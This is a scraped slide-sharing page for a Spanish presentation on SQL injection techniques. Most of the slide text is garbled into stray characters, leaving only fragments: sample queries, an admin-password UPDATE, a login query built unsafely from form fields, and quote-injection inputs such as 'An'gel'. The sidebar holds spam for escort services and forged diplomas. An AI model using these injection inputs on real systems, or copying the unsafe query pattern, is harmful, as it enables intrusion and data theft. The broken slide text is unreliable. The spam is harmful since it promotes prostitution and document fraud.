ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1
ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1
ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1Dimitris Psounis
 
Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...
Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...
Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...Geert Van Pamel
 
ΠΛΗ31 ΜΑΘΗΜΑ 1.4 - ΚΑΡΤΑ (ΕΚΤΥΠΩΣΗ)
ΠΛΗ31 ΜΑΘΗΜΑ 1.4 - ΚΑΡΤΑ (ΕΚΤΥΠΩΣΗ) ΠΛΗ31 ΜΑΘΗΜΑ 1.4 - ΚΑΡΤΑ (ΕΚΤΥΠΩΣΗ)
ΠΛΗ31 ΜΑΘΗΜΑ 1.4 - ΚΑΡΤΑ (ΕΚΤΥΠΩΣΗ) Dimitris Psounis
 
Peace through understanding Islam || Mawlana Feizel Chothia || Australian Isl...
Peace through understanding Islam || Mawlana Feizel Chothia || Australian Isl...Peace through understanding Islam || Mawlana Feizel Chothia || Australian Isl...
Peace through understanding Islam || Mawlana Feizel Chothia || Australian Isl...Muhammad Nabeel Musharraf
 
Media sosial mention2011-libre
Media sosial mention2011-libreMedia sosial mention2011-libre
Media sosial mention2011-libreMelur Orkid
 
Poverty eradication focusing on artisanal mining
Poverty eradication focusing on artisanal miningPoverty eradication focusing on artisanal mining
Poverty eradication focusing on artisanal miningDr Lendy Spires
 
16 intégrales curvilignes, formes différentielles
16 intégrales curvilignes, formes différentielles16 intégrales curvilignes, formes différentielles
16 intégrales curvilignes, formes différentiellesAchraf Ourti
 
ΠΛΗ20 ΚΑΡΤΕΣ ΜΑΘΗΜΑΤΟΣ 1.5 (ΕΚΤΥΠΩΣΗ)
ΠΛΗ20 ΚΑΡΤΕΣ ΜΑΘΗΜΑΤΟΣ 1.5 (ΕΚΤΥΠΩΣΗ)ΠΛΗ20 ΚΑΡΤΕΣ ΜΑΘΗΜΑΤΟΣ 1.5 (ΕΚΤΥΠΩΣΗ)
ΠΛΗ20 ΚΑΡΤΕΣ ΜΑΘΗΜΑΤΟΣ 1.5 (ΕΚΤΥΠΩΣΗ)Dimitris Psounis
 

Semelhante a Tecnicas de sql injection (20)

Sorting insertion-sort
Sorting insertion-sortSorting insertion-sort
Sorting insertion-sort
 
Les antigènes de P .Falciparum
Les antigènes de P .FalciparumLes antigènes de P .Falciparum
Les antigènes de P .Falciparum
 
Fusion 06 2003
Fusion 06 2003Fusion 06 2003
Fusion 06 2003
 
Modul kerajaan-sriwijaya
Modul kerajaan-sriwijayaModul kerajaan-sriwijaya
Modul kerajaan-sriwijaya
 
Biomoleculas
BiomoleculasBiomoleculas
Biomoleculas
 
Hacia un elearning multisoporte y multicanal: uso de nuevos soportes en los c...
Hacia un elearning multisoporte y multicanal: uso de nuevos soportes en los c...Hacia un elearning multisoporte y multicanal: uso de nuevos soportes en los c...
Hacia un elearning multisoporte y multicanal: uso de nuevos soportes en los c...
 
2010 financieel jaarverslag
2010 financieel jaarverslag2010 financieel jaarverslag
2010 financieel jaarverslag
 
Susceptibilité familiale et éthnique au paludisme
Susceptibilité familiale et éthnique au paludismeSusceptibilité familiale et éthnique au paludisme
Susceptibilité familiale et éthnique au paludisme
 
Euawr workshop brochure
Euawr workshop brochureEuawr workshop brochure
Euawr workshop brochure
 
Torquato Dalcich - Un diario (1944 - 1945)
Torquato Dalcich - Un diario (1944 - 1945)Torquato Dalcich - Un diario (1944 - 1945)
Torquato Dalcich - Un diario (1944 - 1945)
 
ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1
ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1
ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1
 
Analisis estructural parte 3
Analisis estructural parte 3Analisis estructural parte 3
Analisis estructural parte 3
 
Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...
Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...
Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...
 
ΠΛΗ31 ΜΑΘΗΜΑ 1.4 - ΚΑΡΤΑ (ΕΚΤΥΠΩΣΗ)
ΠΛΗ31 ΜΑΘΗΜΑ 1.4 - ΚΑΡΤΑ (ΕΚΤΥΠΩΣΗ) ΠΛΗ31 ΜΑΘΗΜΑ 1.4 - ΚΑΡΤΑ (ΕΚΤΥΠΩΣΗ)
ΠΛΗ31 ΜΑΘΗΜΑ 1.4 - ΚΑΡΤΑ (ΕΚΤΥΠΩΣΗ)
 
Peace through understanding Islam || Mawlana Feizel Chothia || Australian Isl...
Peace through understanding Islam || Mawlana Feizel Chothia || Australian Isl...Peace through understanding Islam || Mawlana Feizel Chothia || Australian Isl...
Peace through understanding Islam || Mawlana Feizel Chothia || Australian Isl...
 
Media sosial mention2011-libre
Media sosial mention2011-libreMedia sosial mention2011-libre
Media sosial mention2011-libre
 
Poverty eradication focusing on artisanal mining
Poverty eradication focusing on artisanal miningPoverty eradication focusing on artisanal mining
Poverty eradication focusing on artisanal mining
 
16 intégrales curvilignes, formes différentielles
16 intégrales curvilignes, formes différentielles16 intégrales curvilignes, formes différentielles
16 intégrales curvilignes, formes différentielles
 
ΠΛΗ20 ΚΑΡΤΕΣ ΜΑΘΗΜΑΤΟΣ 1.5 (ΕΚΤΥΠΩΣΗ)
ΠΛΗ20 ΚΑΡΤΕΣ ΜΑΘΗΜΑΤΟΣ 1.5 (ΕΚΤΥΠΩΣΗ)ΠΛΗ20 ΚΑΡΤΕΣ ΜΑΘΗΜΑΤΟΣ 1.5 (ΕΚΤΥΠΩΣΗ)
ΠΛΗ20 ΚΑΡΤΕΣ ΜΑΘΗΜΑΤΟΣ 1.5 (ΕΚΤΥΠΩΣΗ)
 
If you can
If you canIf you can
If you can
 

Mais de Alan Resendiz

Comandos GNU/Linux-Unix y programación shell.
Comandos GNU/Linux-Unix y programación shell.Comandos GNU/Linux-Unix y programación shell.
Comandos GNU/Linux-Unix y programación shell.Alan Resendiz
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones webAlan Resendiz
 
50 trucos para google
50 trucos para google50 trucos para google
50 trucos para googleAlan Resendiz
 
Sistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de ServicioSistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de ServicioAlan Resendiz
 
Revista de conceptos informáticos
Revista de conceptos informáticosRevista de conceptos informáticos
Revista de conceptos informáticosAlan Resendiz
 

Mais de Alan Resendiz (11)

Http al descubierto
Http al descubiertoHttp al descubierto
Http al descubierto
 
Comandos linux
Comandos linuxComandos linux
Comandos linux
 
Xss con javascript
Xss con javascriptXss con javascript
Xss con javascript
 
Xss a fondo
Xss a fondoXss a fondo
Xss a fondo
 
Comandos GNU/Linux-Unix y programación shell.
Comandos GNU/Linux-Unix y programación shell.Comandos GNU/Linux-Unix y programación shell.
Comandos GNU/Linux-Unix y programación shell.
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones web
 
Lenguaje html
Lenguaje htmlLenguaje html
Lenguaje html
 
50 trucos para google
50 trucos para google50 trucos para google
50 trucos para google
 
Manual de linux
Manual de linuxManual de linux
Manual de linux
 
Sistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de ServicioSistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de Servicio
 
Revista de conceptos informáticos
Revista de conceptos informáticosRevista de conceptos informáticos
Revista de conceptos informáticos
 

Último

SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predieusebiomeyer
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书zdzoqco
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationLinaWolf1
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Sonam Pathan
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Sonam Pathan
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa494f574xmv
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一z xss
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书rnrncn29
 
NSX-T and Service Interfaces presentation
NSX-T and Service Interfaces presentationNSX-T and Service Interfaces presentation
NSX-T and Service Interfaces presentationMarko4394
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxDyna Gilbert
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书rnrncn29
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作ys8omjxb
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxeditsforyah
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhimiss dipika
 

Último (17)

SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 Documentation
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
 
NSX-T and Service Interfaces presentation
NSX-T and Service Interfaces presentationNSX-T and Service Interfaces presentation
NSX-T and Service Interfaces presentation
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptx
 
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Serviceyoung call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptx
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhi
 

Tecnicas de sql injection

  • 1. !
  • 2. ! " #$%& ' ( ) " * + " ,- # . / "0#$% ' " , * ) 1 % )" + ! " , * , ") - ** 2 #$% ' " - " " 3 #$% 4 ) 5 , ! ) % " " 5 " 67" ) " " " . " * 8* " ! 6 . " . 5 9 " , # #$% 4 :) * * + ;7 " / # . ; , " 8< + " " = " " " ) " >; ) - " .> 5 " , " 4 ' " ; " 4 # ! " 8< # ! " 4 ! ' , * ? #$% 4 : " - " " , " @ ' " ' " " A " B * " + % " ' " C ; " A " " ' ) " 5. " "" # 8 " )4 * " & " 7 " " " ( D # ) + = * 6 " " " " " ) & " + 6 9 & 6 & " . " + " " . ! & 9 " " " " 6 ( " " " . " & . " " 4 " " " "& "= 7 " + " ( " 7< " ) " . (( # +
  • 3. 2 ; " " 6 " . " " .& 9 " ) ) * 9 * " " 6 ) + " " " ) " 5 . " & 7 " 6 (& " " " . 4 #$%& " * " 9 " " ( " " " " " $ ! % & ' 5 * " D C 2 . " " ) 4 ) " ) " 6 " . - ' & )4 6 " . 4 " * 9 " * " 9 " ) " " "& 9 " 9 ( " ) 4 ( ) " & " * ) " * . " 4 " " % " + 4 " . 4 #8$ 8% ># 8 . " $ + % . . > * 6 * 6 7 " D C & #8$ 8% + * & 6 " . "& #$% E# $ + % . . F ! * " " " " D " & 9 - ( " ) " " ,- 9 " . & 9 . 4 #$% " 6 + = " " " E#+) " & : + " * <F * 6 " " 51# CB@ + " #: * " CB % . . = " 6 " " #$%BC + #$%C & " " ) 4 " " " "& + .= . " 6 " " 6 " " " +& " D " " >! #$%> " 9 4 " 9 " " . 4 ) ) " 6 " & ( 4 " " . " 4 " "= 9 . & 6 " " #$%2 " ) " " . 4 " . 6 "& 9 " + 9 " " " " 6 6 " 6 . 4 " ( ) * # +, $ ( " " " " " ) " " " 9 - + " * & ) 4 ) 4 " " 9 " = " " = ,:# ! 9 "& 9 " * " & " ) ) 4 9 " 6 " 2 G " E, . * & " 6 " " " " " " F& " * ) " D= " " ) " ) :# & " " " ) " ) " . " 6 " !' " " %51
  • 4. 3 5 ) & " " C & 9 " " . ) " " " ( ) " ) & ) 9 . ) " " 6 " 7 9 9 " ) 4 & " 9 " ) * " " - " . = " 6 6 " # & E! 9 " ) " 6 " 2F " 9 " * ) 4 = " * 9 " ) :# 2 % " 9 " 7" " " & + ) " " " ) " & " * * 9 - " . = " :# " 9 " * & ) = ) 9 " ) " :# 2 G " 1; 8 " " & " * ( ) 9 " 6 " " 6 & 9 = " . " 9 6 6 " . ' " & 6 " 9 " )= " #+) " " - " , " 9 . :# + " * G " 1; , " * D CC = 6 " ) #0#$%& ) 4 ) > " * #$% # 6 3 * G " 1;> H " & " ( = ( " " D CC2 , " " & 67" " " * #$%& " * " 6 " 6 " " " . E#$% F& 9 ( " . " " " " " & " + CC? " #$% @ " & " 9 " " " 9 6 " #+) " G " 1;& + . #$% CCB " * 0 " ) " . . 6 " " " 5 ) . " & " * #$% " 6 " & 9 " " " " I ) & " 9 " ) " * " ) . " - " , " ( #$% # 6 & " 6 ) " 9 " . " " & " . " " "& " " " " 6 4 " " " . " & 9 " " " " " "& ) = " 4 6 " . . " " =" " "- .# / ! 0 ' 9 * & " " * & * " 9 6 9 " " " * " + 9 " " "& " " " ) " 6 "& + " " #$% # 6 " < " .
  • 5. ? # ) " ) + " " #$% ) " & 4 & * " " ) " " ) " " . 9 )6 ) = " ) 4 . & " 9 . " " & " 9 & " & " + ) " ) 4 " E' " " J " " " " #0#$% # 6 & 9 " 6 " " F 8 " " & " . " " ) " " 9 " 6 ) " " " " " " " #0#$% 9 " . & 6 6 " 9 " . " )4 6 & " 7 " #$% 4 %# ) ; . " & ". " * " " " " + " 6 "& 9 4 " " #0#$%& " "* " * & 4 " " "& 9 ) " . 6 " 8 " #0#$% " . " " >#5> + . " = " & "" * " " > > E- KKF 8 " 9 . " = & 9 6 " #5 " ( . " " 6 4 " EIF " #0#$% # 6 & ) " " ) " " " & " ) 7 " " 6 " < " 6 . "& " 4 & " " < " ( 1 ( * $# + ) #0#$% " < " " "& ) = " 1 % )" 6 L"& " 4 " " . " " < " " ) 4 " 5 " " 6 " E#51& 5 ; M& !N #!N& ;'!& F + = " " " ( 9 " 9 " " * " " & " " " ;'! ! + 1 ! 5 " + " 9 " E8" F ( ) " " & " 6 #0#$% # 6 & " " ;'! 332 5 ) " ) " I . " 9 . " ) " + ) 4 " 6 " 9 " " " + * " " " " ) 9 " " ) " " " . & 9 " #0#$% " & *
  • 6. @ 8 * 6 " ) " " = " " D " 6 #$% E! 4 #5 "" > >F " " " " 7 " + #$% " 9 6 " . " & " 9 ) 7 "& " " 6 "& . ;:,:# " " " ) " " 6 ) 1 + ( & ,#)) ; , 6 % * " >; ! * . " * #$% # 6 > O#$% # 6 " * " " " , ") " - ** " " " > 8" " . * 9 1: < " 6 "& " 9 " " * * " + " " 6 P & " " " " 6= " 9 " " " ,! " #$% # 6 " & " ) . " " " " " " < "& 9 + " " ) < & " " " " " 6 ) " # ) " " " " * " ") " ) ** #$%& 9 " " ) > M . 8< " G " >& " ) " ") ) ** " ) " " " " " >" 6Q * EF> 5 " < = " > M . 8< " G " > E #-1 B303B 022CB0@F " " 9 ( < ) < Q M9 < Q " " < Q < < Q" "9 " + < Q"9 . < Q " " < Q" 6 < Q " + " < Q 6) ! -""" " Q " Q " Q . + " Q " + " Q " +
  • 7. "2 % & , ; " ) & #$% " . 4 " " 5 " " * " < " " " " " E!%0#$% " : & ; " 0#$% " " * F " 6 "& < " . " " " "& . " " " " & " * * " 6 ( " " " . " % & +% + % ! .# . & / 51; ( . " " 8H:R8 ( 6 " " ,81S ( . " % & ++ + + ) .# . & ' 85;8 ( 6 " ) "& " = " , :! 8 ) " = " 5%;8 ( * " ) " . . " ) * " " % & + + #! .# . & #8%8'; ( " . " " ) " " 9 " "* . 1#8 ; ( . " " ) " " J !,5;8 ( * " 6 " " " + . " " " * " ,8%8;8 ( . " " ) ) " " %! # #! % " " " " " * ( " * " " 9 " " %! # #! A : ( " * ) " 6 " " . " " G 8 8 ( " * " " 9 ) " . " " 9 " 6 " / : ! -S ( " " . " " " " . " " =* " 5H 1/ ( < " 9 ) " "* . : ,8 -S ( " . " " " " " *
  • 8. B 3 % & T 9 U + 9 TU , " TV . 9 UV + . 9 V . 9 -8;G881 ( " * 6 6 " % R8 ( 1 ( " * . " " ) " " 4 & ! SELECT * FROM Tabla; E8" " 6 6 " " " . " " ) >; ) >F UPADTE Tabla SET password = 'Juajuajua' WHERE user = 'admin' E8" " ( = "" " & 6 F 5 ) & " . 4 #$%& " * 9 4 " " "& " 9 " " * " " " + 4 " #$% " & " " " 4 " ! . * & = " " * 4 " ) & " " " " 4 " " & 4 # ) " & " 6 " & " + " " 9 6 " . " & " " " 6 " 9 9 7 + #$% " " ) "5 # # 6 7 " 9 . ( . * " 9 "& " . " = " . " " >5 9 " H ) " ' 8 >& " 9 * 6 & " " 9 " ) & & " " " #$% ) "&
  • 9. C " 6 " ) & )4 6 * " " " = " # ) " < 6 " " ) " "& " 6 " ) " . * & " 9 " " * " " 6 " 6 9 " . " 6 " " " < + . " " ) " " " " 6 ) 5 " * " 4 . 4 J . " & ! " # " & " * " " 9 . " " " 7 " " " 8 " & + )4 6 . .J " " " & " " ! " # & ) 4 " " . " " 0 8* " ! 6 . " 0 5 9 " , # #$% 4 0 :) * 0 8< + " " = " 0 ' " ; " , " * & " 4 * 9 * + 9 . ) 4 " . " )4 6 " " * " 6 " ( 6! # ) 7 >#$% 4 > " ) J ) " " " * #0#$%& " 9 . " 9 " & " & 9 " " 9 ) . < 7< 8" " . * 9 " " ) " " " " " " 6 ( " . " " * " 9 6 " " < " * "& " 9 & . " ". * 8" " 6 " " " =* " " 9 + " " " G " * # 6 " 4 " ) " " 5#! ) " " " #0 #$%& " " " G " 9 * " 6 " ) + 4! $ (! & 5 9 " =" " 9 " " " 6 ) & * " ( " " " + .= " " " < 7< "
  • 10. 8 9 + = " " " ) ) " ) 9 ( 6 & " 9 ) 4 " " " 9 " 9 " " " " 8" " ) 9 + = " " "& " 6 " 6 ) " "& ) " " 6 " & " " 6 " 6 ) " " " " 6 " " 6 )& " 9 ) 7 " * " " " ) " " ; " " " * " )& " " : % & " " " & " " " " 6 "& + " ) * " * " " 6 ) . " " ) " + " D :M& " ) 6 " * + = " " " " 9 " " . ) " " ) M. & " . < " " " + " " * " " 8 "& ) . ( ) " " " ) .J " " " * & 6 ( = " = " 6 " . " ) " . " <FORM action=logon/logon.asp method=post> <input type=hidden username=_UserName password=_Password> </FORM> 8" * . . & ) " " " " . " " . 5#! 9 " " 6 " & ) " " E! + J " " ( ) * ; %& 9 . 5#! " < ) " "& . " " " . " " * ; % + 6 6 " " F 8 * 6 + ) ) & * & " . " " + 6 . "= select * from users where username = _UserName and password = _Password 5 ) 9 " " " " & ( " " " . & * " 6 " " " . "II ) " " "= + & " . " " 6 6 4 & " " &
  • 11. + ) ) " " ) " < " % " * " " http://www.objetivo.com/libreria.asp?edicion='Noviembre' ! " " & " % = ) " " " " " 9 + " . " " ) + ) " " " .= EN,F ) 7 " " L1 6 ) L " " " 6 . 5#! 9 " 8 " " & + ) ) ) 4 . . ) " " " "* " " " . 9 * 6 " 6 . " select * from numeros_anteriores where edicion = 'Noviembre' " & " 9 ) " " " * " " ) " #$% > 6 >& = " " 9 " . * 7 " " . & + . " + " + 9 ) " " " " " & " " " 9 + #$% 5 6 " " " * " " 4 " " " & " " ) " " + " ! & " " L E' # F ( " " " ) " " ( ) 4 " ) + . % L E' # F " " * #$% # 6 * "& " 9 " 6 9 " 4 " * " 9 6 & " 9 " " " " ) 9 + #$% H " 4 9 = " " " " " . ) ( * . " + ) " " " & " Usuario : An'gel Password : 338xD select * from users where username = 'An'gel' and password = '338xD'
  • 12. select * from numeros_anteriores where edicion = 'N'oviembre' 8 ) " " " 9 " 9 " " " " " " " #$% # 6 & " 9 " & " 9 " . " . ( " " + " . " username = 'An' edicion = 'N' % . & " . 9 " . " * " "& #$%& * " ( & 4 " " " & " 9 9 9 " " " " + & " . * #$% # 6 5 ) 9 " = " " . + * . " 9 " " " L5 L + L1L II 8 " & . " " 6 " 9 9 " .J 6 6 67" ) " " + " " * " " 4 " * " %& " " " ) "& " " ( 6 & ( . " 8" " * 6 & " 6 9 " " " " " " " " )4 6 + ) 4 " " " " )" " ) " " . " . & " " " " " " " 6 "& " * " 9 " . ) " " 8 * 6 & 9 " " " . " " & " " 6 6 . & ) ) . " .J . 7< + . ) A ) = " ) 7 & " " " " 6 " & 9 " " E84 " " ? >8 # 6 >F " 6 " " ) 7 " " . & 9 + #$% " 6 ) " " 9 "& 9 " < 9 ) " " ) 4 + " ( 7 " " " " ' " ' & " ) 4 > . #$% # 6 " . #$% 4 > EH B * " + " "F ( ( 9 " " * . 6 ) " 9 " . " <
  • 13. 2 1 $ % & ' (#)* +! , - . , / % 0 , , 123 % & - & ) " 6 9 * & " " " & " ) " " " ) ) " * " " " ) " " + "& . " " I " + = " " "& + " 9 " . & " ( .J ) " E! * >. . >F ) " " 9 " ." > . " > ) " " " . " " >% " ' "> )4 6 6 6 7 ! 8 ( . " 6 " " 7 " #$% 4 & " * 9 " . " 9 " " "& 9 . " " ; %& 5#!& & " " " 6 ( 9 " < #$% # 6 ' " 9 " ) "& "& .J " 6 ) & " & 4 & . " + ) 4 * & 6 " " * " EH > % " ' ">F # ) & " > 6 " > + = " " " = " * " 6 & " " . 9 " ) ) + = " " " " " 9 & 4 & " " . " . " " " ) "= 8 " " & . " " 6 ) " " 6 " # ) . " " " " ) " * & 1: ) ) " & " " " " * " * " " & " 6 " 6 " " " ) E8" " ) "& ) 6= " "& " ) 6 " + . F 9 ;:,5 * & 6 " " > "> " + J 9 " " " 6 ( " . 9 " ) ! " " 6 " & . " = & " ( . " 7 " " " 9 . * ) " . " " 7 & "= ) 7 * 9 " =
  • 14. 3 $ (! 6) $ (! ) & 3( " " " " " .= "& : 0% ! . " " & # 86 " : 0% & " , " " + * " .= & ! . " " " " D " 9 " 6 " + ) " < " " + * " " " " " " " . *= " " " - & 9 4 4 4 ) " . " 4 " " " " " " " " " ) "& 9 " "& " . " " 6 " * . / = " + " 5 " " " " & ) ) * "& ) . " " + * "& " " ) 6 " " " ! " " " . " . I ) & " 6 " " * " "& " E> L >F * + " 6 " * " ) 6 " H 7 " " + .J " " " " . " #$% = " " " * 9 " " " . " " . ! " 9 + = " " " " " * " ) * ; % 5#!& * " " = " " 9 6 " 9 " " " 6 "& . " # 5 : + !5##G: , " " . . 5#! 9 ) " + 6 #$% ; ) 7 = " " 9 * " " 6 #$% " < " " . " " " 4 " ! 6 " 4 8" " * . < = " ) 6 ) & . *= ---- Extracto ------------------------------------------- <FORM action=ingreso.asp method=post> <TABLE cellSpacing=1 cellPadding=3 width=440 bgColor=#ffffff border=0> <TBODY> <TR bgColor=#ff0066> <TD><B><FONT face="Arial, Helvetica, sans-serif"
  • 15. ? size=2>Nombre</FONT></B></TD> <TD><B><FONT face="Arial, Helvetica, sans-serif" size=2>Clave</FONT></B></TD></TR> <TR bgColor=#ffcccc> <TD><INPUT name=USERNAME> </TD> <TD><INPUT type=password value="" name=PASSWORD> </TD></TR> <TR align=middle bgColor=#ff0066> <TD colSpan=2><INPUT type=submit value=INGRESAR! name=SUBMIT> </TD></TR></TBODY></TABLE><BR><BR></FORM></TD> <TD vAlign=top align=left width=10> </TD> <TD vAlign=top align=left width=140> <TABLE cellSpacing=0 cellPadding=0 width=140 border=0> <TBODY> ---- Extracto ------------------------------------------- ! " 9 * ( = & ; % " "& + " 4 . 5#! E! " " & . " " F 5 ) & " " 9 ) 4 ( . " " & " 9 6 " " " " " "& " " " 9 * #$% " 6 " " ) " ) . 9 + " 6 " " select * from users where username = 'Angel' and password = '338xD' ! " " 9 " " + "" 